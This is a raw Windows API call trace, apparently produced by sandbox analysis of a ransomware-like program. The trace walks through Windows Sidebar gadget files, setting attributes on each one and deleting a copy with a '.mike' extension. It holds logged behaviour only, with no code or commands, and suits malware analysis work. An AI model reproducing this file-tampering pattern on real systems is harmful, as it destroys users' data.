GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.307] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\button_right_mouseout.png", dwFileAttributes=0x80) returned 0 [0104.308] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\button_right_mouseout.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\images\\button_right_mouseout.png.mike")) returned 1 [0104.309] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.313] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\button_right_mouseover.png", dwFileAttributes=0x80) returned 0 [0104.313] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\button_right_mouseover.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\images\\button_right_mouseover.png.mike")) returned 1 [0104.317] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.323] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\default_thumb.jpg", dwFileAttributes=0x80) returned 0 [0104.323] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\default_thumb.jpg.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\images\\default_thumb.jpg.mike")) returned 1 [0104.324] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.329] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\ehshellLogo.png", dwFileAttributes=0x80) returned 0 [0104.329] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\ehshellLogo.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\images\\ehshelllogo.png.mike")) returned 1 [0104.330] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.349] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\flyout_background.png", dwFileAttributes=0x80) returned 0 [0104.349] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\flyout_background.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\images\\flyout_background.png.mike")) returned 1 [0104.354] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.358] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\Gadget_Flyout_Thumbnail_Shadow.png", dwFileAttributes=0x80) returned 0 [0104.358] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\Gadget_Flyout_Thumbnail_Shadow.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\images\\gadget_flyout_thumbnail_shadow.png.mike")) returned 1 [0104.360] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.380] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\Gadget_Main_Background_Loading.png", dwFileAttributes=0x80) returned 0 [0104.381] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\Gadget_Main_Background_Loading.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\images\\gadget_main_background_loading.png.mike")) returned 1 [0104.383] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.390] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\Gadget_Main_Background_QuickLaunch.png", dwFileAttributes=0x80) returned 0 [0104.390] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\Gadget_Main_Background_QuickLaunch.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\images\\gadget_main_background_quicklaunch.png.mike")) returned 1 [0104.392] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.399] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\Gadget_Main_Gradient.png", dwFileAttributes=0x80) returned 0 [0104.399] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\Gadget_Main_Gradient.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\images\\gadget_main_gradient.png.mike")) returned 1 [0104.401] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.404] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\Gadget_Star_Empty.png", dwFileAttributes=0x80) returned 0 [0104.405] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\Gadget_Star_Empty.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\images\\gadget_star_empty.png.mike")) returned 1 [0104.406] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.410] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\Gadget_Star_Full.png", dwFileAttributes=0x80) returned 0 [0104.410] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\Gadget_Star_Full.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\images\\gadget_star_full.png.mike")) returned 1 [0104.411] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.415] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\Gadget_Star_Half.png", dwFileAttributes=0x80) returned 0 [0104.415] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\Gadget_Star_Half.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\images\\gadget_star_half.png.mike")) returned 1 [0104.417] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.421] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\Gadget_WMC_LogoText.png", dwFileAttributes=0x80) returned 0 [0104.421] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\Gadget_WMC_LogoText.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\images\\gadget_wmc_logotext.png.mike")) returned 1 [0104.423] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.427] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\logo.png", dwFileAttributes=0x80) returned 0 [0104.427] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\logo.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\images\\logo.png.mike")) returned 1 [0104.428] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.435] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\main_background.png", dwFileAttributes=0x80) returned 0 [0104.435] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\main_background.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\images\\main_background.png.mike")) returned 1 [0104.437] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0104.437] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0104.437] CoTaskMemFree (pv=0x506980) [0104.437] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0104.437] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0104.437] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0104.437] CoTaskMemFree (pv=0x506980) [0104.437] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0104.439] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0104.447] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\drag.png", dwFileAttributes=0x80) returned 0 [0104.448] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\drag.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\drag.png.mike")) returned 1 [0104.449] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0104.454] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\icon.png", dwFileAttributes=0x80) returned 0 [0104.454] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\icon.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\icon.png.mike")) returned 1 [0104.456] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0104.460] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\logo.png", dwFileAttributes=0x80) returned 0 [0104.460] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\logo.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\logo.png.mike")) returned 1 [0104.462] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0104.462] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0104.462] CoTaskMemFree (pv=0x506980) [0104.462] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0104.463] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.470] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\gadget.xml", dwFileAttributes=0x80) returned 0 [0104.471] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\gadget.xml.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\en-us\\gadget.xml.mike")) returned 1 [0104.472] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.477] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\picturePuzzle.html", dwFileAttributes=0x80) returned 0 [0104.477] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\picturePuzzle.html.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\en-us\\picturepuzzle.html.mike")) returned 1 [0104.479] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.485] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\settings.html", dwFileAttributes=0x80) returned 0 [0104.486] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\settings.html.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\en-us\\settings.html.mike")) returned 1 [0104.487] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0104.487] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0104.487] CoTaskMemFree (pv=0x506980) [0104.487] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0104.488] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0104.488] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0104.488] CoTaskMemFree (pv=0x506980) [0104.488] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0104.489] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0104.489] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0104.489] CoTaskMemFree (pv=0x506980) [0104.489] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0104.497] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.501] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\0.png", dwFileAttributes=0x80) returned 0 [0104.502] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\0.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\0.png.mike")) returned 1 [0104.504] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.510] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\1.png", dwFileAttributes=0x80) returned 0 [0104.510] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\1.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\1.png.mike")) returned 1 [0104.512] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.518] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\10.png", dwFileAttributes=0x80) returned 0 [0104.518] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\10.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\10.png.mike")) returned 1 [0104.521] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.528] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\11.png", dwFileAttributes=0x80) returned 0 [0104.528] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\11.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\11.png.mike")) returned 1 [0104.529] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.536] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\2.png", dwFileAttributes=0x80) returned 0 [0104.536] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\2.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\2.png.mike")) returned 1 [0104.538] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.544] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\3.png", dwFileAttributes=0x80) returned 0 [0104.545] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\3.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\3.png.mike")) returned 1 [0104.546] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.551] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\4.png", dwFileAttributes=0x80) returned 0 [0104.552] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\4.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\4.png.mike")) returned 1 [0104.554] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.560] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\5.png", dwFileAttributes=0x80) returned 0 [0104.560] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\5.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\5.png.mike")) returned 1 [0104.562] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.568] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\6.png", dwFileAttributes=0x80) returned 0 [0104.568] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\6.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\6.png.mike")) returned 1 [0104.570] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.576] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\7.png", dwFileAttributes=0x80) returned 0 [0104.577] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\7.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\7.png.mike")) returned 1 [0104.578] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.584] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\8.png", dwFileAttributes=0x80) returned 0 [0104.584] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\8.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\8.png.mike")) returned 1 [0104.587] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.593] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\9.png", dwFileAttributes=0x80) returned 0 [0104.593] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\9.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\9.png.mike")) returned 1 [0104.594] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, 